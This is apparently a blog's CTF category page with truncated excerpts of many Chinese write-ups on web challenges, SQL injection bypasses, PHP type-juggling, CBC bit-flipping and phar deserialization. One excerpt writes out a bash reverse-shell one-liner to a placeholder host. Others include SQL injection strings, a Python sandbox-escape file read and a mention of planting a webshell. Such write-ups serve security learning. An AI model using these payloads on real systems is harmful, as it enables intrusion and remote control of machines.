ctf
文章平均质量分 69
Xi4or0uji
求你别咸鱼
展开
-
一个phar://的漏洞
前段时间打了个护网杯,题目质量是真的高,肉鸡又菜了一整场,遇到了一个不太会的东西,复现了一波,记录下好吧。这个鬼东西就是phar://的序列化的漏洞介绍一下phar://跟php://filter 、data://那些一样,都是流包装,可以将一组php文件进行打包,可以创建默认执行的stubstub就是一个标志,格式xxx<?php xxxxx; __HALT_COMPIL...原创 2018-10-17 22:41:22 · 5836 阅读 · 0 评论 -
jarvis oj(web wp)
api调用这题是slim架构的xxe漏洞,看博客做题2333https://www.leavesongs.com/PENETRATION/slim3-xxe.htmlsimple injectionusername和password是注入点,然后就是确认怎么注入了题目是过滤了空格的,但是可以用/**/绕过确认存在admin表username=admin'/**/...原创 2018-08-19 14:54:45 · 6928 阅读 · 0 评论 -
第一届巅峰极客
这个比赛真的是神仙打架,肉鸡划水到底,记下复现过程miscwarmup图片放去stegsolve看一下可以看见最低位有异常数据(最上面具体分析就会看见两个ook编码,一个brainfuck编码,剩下的就是解码了这里有个注意的是,他的编码每一句都在后面加了个英文的句号(你是魔鬼吧??),解码时要把它去掉拼在一起就是flag了loli有个二维...原创 2019-03-09 22:45:44 · 1870 阅读 · 2 评论 -
2017ciscn
miscwarmup这题是盲水印加密,拿到一个加密的压缩包和一张png图片,png加密成zip包,然后明文攻击原来的压缩包(时间贼久,等了一个晚上才把压缩包解密了..........看到两张差不多的图丢去stegsolve XOR一下可以看见一堆横纹,然后应该就是盲水印了最后就是放去解密python bwm.py encode fuli.png fuli2.png re...原创 2018-08-04 14:11:19 · 1385 阅读 · 1 评论 -
第二届广东省强网杯
webbroken打开网页拿到一个文件,是jsfuck编码,但是损坏了,然后将开头的[[改成[][就可以解码了然后直接拿去网站解码就行了,注意他弹出的不是flag,他的flag是一个变量名的赋值解码网站推荐https://enkhee-osiris.github.io/Decoder-JSFuck/who are you点进去发现没有权限,然后继续找找,看见cookie...原创 2018-07-20 22:35:31 · 822 阅读 · 0 评论 -
QCTF 2018xman夏令营选拔赛
小肉鸡太菜了,就只做了三题orz.......x-man-a-face这题挺简单的,拿到一个图片,看见有个二维码发现少了两个定位点,用photoshop补全扫一下就出来一串KFBVIRT3KBZGK5DUPFPVG2LTORSXEX2XNBXV6QTVPFZV6TLFL5GG6YTTORSXE7I=然后base32解码就行了Lottery这题是弱类型匹配,进...原创 2018-07-15 09:20:56 · 2199 阅读 · 0 评论 -
让我进去-实验吧
这道题进去看见cookie有个source值很奇怪,把他改成1试一下就收到这段代码$flag = "XXXXXXXXXXXXXXXXXXXXXXX";$secret = "XXXXXXXXXXXXXXX"; // This secret is 15 characters long for security!$username = $_POST["username"];$password =...原创 2018-05-30 15:05:25 · 4873 阅读 · 0 评论 -
加了料的报错注入-实验吧
去fuzz一下waf可以看到username不能用括号,然鹅password不能用floor,updatexml,polygon,multipoint,extractvalue,geometrycollection,multinestring,mulpolygon,linestring这些报错函数所以...........怎么注入?!...原创 2018-06-05 21:32:42 · 886 阅读 · 1 评论 -
认真一点!-实验吧
这个题其实是个布尔盲注题,怎么说,正常是you are in,报错是you are not in,触发waf是sql injection detected然后fuzz一下,图我就不贴了,做的时候忘了截下图结果大概是过滤了and,空格,逗号,union,+这里有个坑,fuzz的时候or是可以用的,但是尝试id = 1'/**/or/**/'1'='1的时候报you are not in,不应该啊试了...原创 2018-06-05 00:17:48 · 3077 阅读 · 1 评论 -
sql注入绕过小总结
这篇应该会一直更新,反正遇到了就记一记免得忘了一、引号在sql语句where部分,会用到引号,举个栗子select column_name from information_schema.columns where table_name="table"如果引号过滤了,那样的话上面的查询就进行不了了,这个时候可以用十六进制进行绕过“table"十六进制是0x937461626c6522这样,原来的p...原创 2018-06-02 22:39:56 · 1029 阅读 · 0 评论 -
南邮ctf(web wp)
签到源代码就有了md5 collision传一个字符串,值跟QNKCDZO一样但是又不是它的就行了签到2改了本地的maxlength就能输进去zhimakaimen然后拿到flag了这题不是WEB把图片下载下来丢去010editor就能看到flag了层层递进点进去一直找,找到一个404.html就能看到了,真的藏得很深单身二十年页面很快就跳转,抓...原创 2018-08-20 17:35:46 · 3528 阅读 · 0 评论 -
linux下反弹shell
最近做了几题都是反弹shell,总结一哈bashbash -i >& /dev/tcp/vps_ip/端口号 0>&1bash -i 生成一个交互式的子进程&表示在Linux后台运行/dev/tcp/vps_ip/端口号 其实是与主机建立tcp连接/dev/[tcp|upd]/host/port是Linux里面比较特殊的文件,读取和写入相...原创 2018-09-25 20:55:18 · 1972 阅读 · 0 评论 -
cbc字节翻转攻击
本来很久之前就应该把它学了,但是不能静下心看完,拖到现在.........今天上课的时候跟cg一起看,抱着神仙的大腿将它看完了,cg牛逼!!首先我们先看下他的加密过程可以看到,它先将明文进行分块,第一块与初始变量异或,然后秘钥进行加密,得到的密文再与第二块明文进行异或,继续秘钥加密,以此类推,加密过程有个最显著的特点就是:前一个密文用来产生后一个密文接下来是解密的过程,其实懂了...原创 2018-09-19 20:37:34 · 1325 阅读 · 1 评论 -
hackme(web wp)
oj说了不要直接给flag,所以就只写思路啦~hide and seek源码就有了Guestbook这题是SQL注入看数据库?mod=read&id=-1 union select 1,2,database(),4#然后就看到数据库是g8表?mod=read&id=-1 union select 1,2,(select table_name fr...原创 2018-09-06 14:49:49 · 4336 阅读 · 4 评论 -
solve me(web wp)
warm up逆着解下码<?php$chars = "1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY=";echo hex2bin(strrev(bin2hex((base64_decode($chars)))));得到结果flag{582a0f2c7e302244b110cc461f5cb100}badcom...原创 2018-09-02 23:06:58 · 1400 阅读 · 0 评论 -
bugku(代码审计 wp)
extract变量覆盖源码<?php$flag='xxx';extract($_GET);if(isset($shiyan)){ $content=trim(file_get_contents($flag)); if($shiyan==$content){ echo'flag{xxx}'; } else{ ech...原创 2018-09-02 00:25:27 · 1725 阅读 · 0 评论 -
bugku(web进阶 wp)
phpcmsv9这题叫道理应该是考phpcmsv9的漏洞的,但是挂了,连注册都注册不了.......不过有个非预期解,访问一个robots.txt居然就看到flag了,交一发还是对的.......正确的解法应该是找到注册页面填写了以后在post数据最后加一句&info[content]=<img src=http://www.bugku.com/tools/phpyi...原创 2018-09-02 00:10:52 · 2547 阅读 · 0 评论 -
网鼎杯第二场 wp
本来应该是高校组,结果报错了,弄成了第二场........尴尬........cal(web)这题在url后面加robots.txt可以看到python报错,所以应该是python命令执行试下1+1|ls,发现触发waf,然后继续试下读文件的函数,一波尝试后获得flag1+1+int(([].__class__.__base__.__subclasses__()[40]('/fla...原创 2018-08-31 23:52:36 · 1237 阅读 · 0 评论 -
BugkuCTF(web wp)
web2源码就有flag文件上传测试服务器挂了兼忘了当初怎么做了(捂脸计算器这题是要你计算一个数学公式的答案,但是发现只能输一个数字,改下maxlength,然后就能输入就有flag了web基础$_GET这题其实考get方法传参,get方法发个flag,payload:?what=flagweb基础$_POSTpost方法传参矛盾这题要传一个num,...原创 2018-08-25 16:32:21 · 4325 阅读 · 1 评论 -
BugkuCTF(分析 wp)
flag这题进去一直看,可以看到黑客最后成功上传了一句话木马,然后就下了一个flag.txt,继续找下去就能看到flag了中国菜刀追踪tcp流可以看见有个flag的压缩包binwalk分离一下打开就看到flag了抓到一只苍蝇 ...原创 2018-08-30 23:21:59 · 1568 阅读 · 0 评论 -
who are you?-实验吧
who are you?这道题点开看见your ip is :xxx.xxx.xx.xxx然后试了巨久改ip,改了一堆了还是撤都没有然后看了大佬的wp的说是时间盲注,试了一下,确实有延迟,然后就用脚本进行时间盲注了爆数据库#-*-coding:utf-8-*-#暴力数据库import requestsimport stringurl = "http://ctf5.shiyanbar.com...原创 2018-05-26 22:38:46 · 1616 阅读 · 4 评论 -
实验吧部分题wp
看起来有点难这道题有点坑,打开页面去试下登录,发现输入admin/admin会报登录失败,错误的用户名和密码,其他的就说数据库没有连上,一开始真的以为没有连上..............然后后面看了下别人的评论,题目没错,那就可能是除了admin其他都是定义好了跳出来数据库没连上http://ctf5.shiyanbar.com/basic/inject/index.php?user...原创 2018-05-26 11:19:16 · 579 阅读 · 0 评论 -
听说你们喜欢手工爆破-2018红帽杯
题目下载看见是一个iso文件,解压拿到一堆txt文件和一个加密的rar压缩包txt的内容都是一样的,base64解密后是Th3r3 1s n0 f1ag然后看到文件名不一样,就想试下用文件名爆破把文件名提出来做个字典进行字典爆破找到密码了,输入打开rar文件看见有个文件打开doc文件发现还是加密的.......暴力破解得到密码打开文件看到然后百度2333猜测是曼切斯特加密,贴个脚本运行出flag了...原创 2018-05-03 00:06:42 · 740 阅读 · 0 评论 -
天下武功唯快不破-实验吧
点开看见然后题目暗示看看响应头,结果看到flag感觉就是base64加密,然后解密,这个时候看下页面代码还有这句所以题目就是想要我们去拿到header的flag,base64解密,然后再在url传key 同时还发现,传过来的flag是个随机值........手动解密是不够时间的了,只能借助脚本的力量了#coding:utf-8import reque...原创 2018-05-08 21:33:40 · 4386 阅读 · 0 评论 -
php黑魔法-moctf
点进去看见好像少了点什么,试下访问index.php,自动跳转回上一页面,题目有php~,试下index.php~,调试看见输入两个值a,b,他们的md5想等的话就可以输出flag这里插多一句,php有个小漏洞,在处理字符串时,利用!=或==对比哈希值时,会把每一个0E开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以0E开头,那么php会认为他们是相同的。所以这里只要构造...原创 2018-03-18 18:12:44 · 1579 阅读 · 2 评论 -
moctf前5题
前五题都很简单,但是也记录下啦~签到加群拿flag一道水题网页真的巨好看,题目也很简单,调试下就看到flag了还是水题点进去发现输入框写不了东西,调试下看见disabled="disabled" maxlength="4"去掉disabled,把4改成5再输入就行了访问限制点进去看见 只允许使用NAIVE浏览器访问,不过说多句这是什么浏览器我还真没听说过(咸鱼的xiaorouji瑟瑟发抖)发送h...原创 2018-03-18 17:45:11 · 594 阅读 · 0 评论 -
贝斯族谱-moctf
点进去看见一堆字符,贼长,不列举了题目叫贝斯族谱容易让人联想到base加密,在线工具试了下发现到了最后有这个东西ngn_qp{qdudtms0u1fz}两个括号让人想到是moctf{xxxxxxxx}的那两个东西,试下凯撒解密,发现不对,数了下前面有6个字符,moctf只有5个字符用栅栏密码移下位置有这个东西npdug{t1nqmf_dszqu0}再试下凯撒解密,ojbk...原创 2018-03-18 16:54:01 · 672 阅读 · 0 评论 -
奇怪汉字-moctf
由口中 由由夫 由由口 由由口 由中由emmm....还真的是第一次见,查了下是当铺密码102 117 110 110 121对应ASCII码解密就行了原创 2018-03-18 16:37:34 · 934 阅读 · 0 评论 -
暴跳老板-moctf
调试看见submit键链接到post.html,跳转后看见表单提交到do.php,直接改url到do.php看到弹窗please POST your email by Dear!这里xiaorouji一开始直接简单粗暴地在textarea输入Dear,结果不行....(当然不行啦→_→你正常点,我害怕)想回这句话please POST your email by Dear!应该是要POST什么值过...原创 2018-03-18 16:09:43 · 941 阅读 · 0 评论 -
美味的饼干-moctf
这道题一打开看到一个登陆页面,尝试下sql注入username = admin'#password= 1=1发现页面跳转登陆成功!欢迎admin'#,调试看见<!--只有admin才有flag-->再看响应发现有段很奇怪的cookielogin:ZWUxMWNiYjE5MDUyZTQwYjA3YWFjMGNhMDYwYzIzZWU=有点像base64,解密得到ee11cbb19052e...原创 2018-03-18 14:54:26 · 1154 阅读 · 0 评论 -
simple upload-2018红帽杯
进去登录看见登录框,随便乱输登下试下,然后登录不成功,看到cookie是0改下cookie的值然后再登录看见文件上传,随便上传文件,说只能上传jpg/png格式的试下上传jpg的话是可以在浏览器访问到上传的图片看报错看到后台只解析java写个lll.jsp脚本挂个木马上去,这里要用burpsuite改下代理请求http://d3d8314a86e94...原创 2018-05-03 00:13:22 · 296 阅读 · 0 评论 -
once more-实验吧
<?phpif (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE) { echo '<p>You password must be alphanumeric</p>'; } else if (strlen($_GET['password']) ...原创 2018-05-10 00:21:34 · 373 阅读 · 0 评论 -
第一届桂林电子科技大学绿盟杯CTF大赛 wp
misc音频分析拿到一个wav文件,用audacity打开看见很明显是摩斯电码..-. .-.. .- --. .. ... -- --- .-. ... . -.... -.... -.... --. ..- . - --.- .-- 解密就出来了数据包分析分析数据包看见发了个flag.jpg,提出来看一下是真的皮呀..........丢去010看见是个压缩包,里面还有个flag.txt!!激动...原创 2018-05-21 19:57:13 · 2964 阅读 · 0 评论 -
猫抓老鼠&what the fuck!这是什么鬼东西?-实验吧
猫抓老鼠就打开网页没看到有什么东西,只是要输入一个key,随便乱输入就看见他返回一个有点奇怪的东西然后把它当做key输进去就拿到flag了,不知这道题究竟在考什么...........可能是我太菜了,看不出,感觉flag出来的有点快.........what the fuck!这是什么鬼东西?就一点开网页,看见.....[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[...原创 2018-05-14 20:07:34 · 556 阅读 · 0 评论 -
NSCTF web200-实验吧
这道题是一题解密题,题目给出了密文和加密程序,然后看着他写出解密脚本就行了加密程序大概是这样 public function encode($str) { $res = ""; $_o = strrev($str); for ($i = 0; $i < strlen($str); $i++) { ...原创 2018-05-14 19:36:20 · 438 阅读 · 0 评论 -
这个看起来有点简单!-实验吧
这道题一开始点进去让人感觉有点蒙圈,不知道要考什么,后来才发现只是道简单的sql注入.........这里写两种做法。sqlmap去跑先去看一下有什么数据库sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --dbs有个my_db的数据库,再去扫一下有什么表sqlmap -u "http://ctf5.shiyan...原创 2018-05-07 23:22:06 · 1370 阅读 · 0 评论 -
天网管理系统-实验吧
进去页面看源码看见有这样一句也就是说,username有个md5函数漏洞,可以用QNKCDZO绕过绕过以后返回访问一下就看见$unserialize_str = $_POST['password']; $data_unserialize = unserialize($unserialize_str); if($data_unserialize['user'] == '???' &a...原创 2018-05-14 16:31:08 · 582 阅读 · 0 评论 -
php函数漏洞
最近做的比较多的题都是代码审计,再加上以前做的一些题,就想整理一下遇到的函数漏洞,当做笔记吧①md5( )函数漏洞md5($a)==md5($b)php利用!=或者==进行弱类型比较的时候,0e开头的哈希值会解释为0常用payloadQNKCDZOs878926199as214587387a②构造一个数满足条件:$number不是数字;$number==strval(intval($number)...原创 2018-05-06 17:41:17 · 395 阅读 · 0 评论 -
你真的会PHP吗?&Forms-实验吧
你真的会php吗?进去看见have a fun!! emmm.......一点都不fun........然后响应头看见hint,访问试下然后就看见后台源码了<?php$info = ""; $req = [];$flag="xxxxxxxxxx";ini_set("display_error", false); error_reporting(0); if(!isset...原创 2018-05-17 16:59:29 · 1670 阅读 · 0 评论 -
拐弯抹角&FALSE-实验吧
最近事是真的多,之前做的题的wp到了现在才写,咸鱼了.............拐弯抹角这道题进去就看见源码,没错了,就是代码审计啊啊啊啊啊题不难,但是确实有学习意义,就贴一贴 <?php// code by SEC@USTCecho '<html><head><meta http-equiv="charset" content="gbk"></...原创 2018-05-17 16:09:56 · 983 阅读 · 0 评论